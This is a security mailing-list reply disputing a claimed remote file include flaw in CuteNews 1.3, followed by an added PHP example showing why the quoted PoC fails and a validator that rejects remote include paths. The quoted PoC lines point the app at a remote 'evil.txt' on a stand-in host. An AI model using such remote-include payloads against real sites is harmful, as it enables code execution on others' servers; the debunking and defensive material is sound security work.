Re: CuteNews 1.3.* Remote File Include Vulnerability
stormhacker@xxxxxxxxxxx wrote:

> -----------------Description---------------
>
> $cutepath =  __FILE__;
> $cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
> $cutepath = preg_replace( "'/search\.php'", "", $cutepath);
>
> require_once("$cutepath/inc/functions.inc.php");
>
> --------------PoC/Exploit----------------------
>
> show_news.php?cutepath=http://host/evil.txt?
> search.php?cutepath=http://host/evil.txt?

> $cutepath =  __FILE__;

$cutepath is set to the script's working directory, so you cannot set it manually.

> --------------Solution---------------------
>
> No Patch available.


As no needed? ;)


Greets,
satalin
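
An added example, not code from the thread or from CuteNews, illustrating the reply's point: because $cutepath is assigned from __FILE__ unconditionally, a request-supplied cutepath value never reaches the require_once; the second function is a hypothetical defensive check for applications that really do build include paths from a variable. The request array is constructed from the PoC string above, and the preg_replace calls are copied from the quoted snippet, so on a script not named search.php they return __FILE__ unchanged.

```php
<?php
// Added example (not CuteNews code). Mirrors the quoted assignment so the
// effect of a request-supplied "cutepath" on the include path can be seen.
function resolve_cutepath(array $get): string
{
    // Even if register_globals had copied $get['cutepath'] into $cutepath,
    // the next line overwrites it with the running script's own path.
    $cutepath = $get['cutepath'] ?? '';       // hypothetical attacker input
    $cutepath = __FILE__;                     // unconditional, as in the quoted code
    $cutepath = preg_replace("'\\\search\.php'", "", $cutepath);
    $cutepath = preg_replace("'/search\.php'", "", $cutepath);
    return $cutepath;                         // derived from __FILE__, never from $get
}

// Hypothetical check for code that DOES derive an include base from a variable:
// reject stream wrappers (http://, ftp://, php://, data://) and any resolved
// path that does not sit inside the application directory.
function safe_include_base(string $candidate, string $appRoot): ?string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $candidate)) {
        return null;                          // URL / wrapper: remote include attempt
    }
    $real = realpath($candidate);
    $root = realpath($appRoot);
    if ($real === false || $root === false) {
        return null;                          // does not exist on the local filesystem
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($real . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;                          // escapes the application directory
    }
    return $real;
}

// Constructed request using the PoC value from the advisory.
$request = ['cutepath' => 'http://host/evil.txt?'];

echo "include base: " . resolve_cutepath($request) . "\n"; // the script's own path
var_dump(safe_include_base($request['cutepath'], __DIR__)); // NULL: wrapper rejected
var_dump(safe_include_base(__DIR__ . '/../', __DIR__));     // NULL: outside app root
var_dump(safe_include_base(__DIR__, __DIR__) === realpath(__DIR__)); // bool(true)
```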